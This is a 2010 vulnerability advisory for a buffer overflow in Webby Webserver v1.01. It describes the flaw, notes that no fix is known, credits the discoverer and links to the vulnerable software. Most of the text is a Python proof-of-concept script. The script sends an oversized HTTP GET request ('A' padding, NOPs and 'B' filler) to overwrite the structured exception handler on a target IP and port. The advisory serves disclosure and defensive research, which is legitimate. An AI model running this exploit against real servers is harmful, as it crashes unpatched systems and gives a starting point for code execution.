Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH)

[michael.messner () integralis com]

---------------------------------------------

Webby Webserver v1.01
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)
Date: 25.05.2010

---------------------------------------------

- Description

Webby is a small webserver for the windows operating system.

- buffer overflow vulnerability

The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC 
overwrites the SEH with NOPs.

- Solution

No known solution available.
No contact details of the author found.

- Credits

The vulnerability was discovered by Michael Messner from Integralis
michael#dot#messner#at#integralis#dot#com

- Timeline

25.05.2010 - Vulnerability discovered

- Reference

Download vulnerable software
http://www.shareware.de/webby-webserver/

- POC

#!/usr/bin/python

import socket
import sys
import os.path
import time

if len(sys.argv) < 2:
        print "Usage: webby.py <IP> <port>"
        sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

string = "A"*790
string += "\x90"*4      
string += "\x42"*105            

method = "GET"
print "starting POC for:", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
        connect=s.connect((ips, port))
except:
        print "no connection possible"
        sys.exit(1)

payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

print "\r\nsending payload"
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))
print "..."

print payload
s.send(payload)
print "finished with method %s and payload %s" % (method,payload)
print "... check SEH"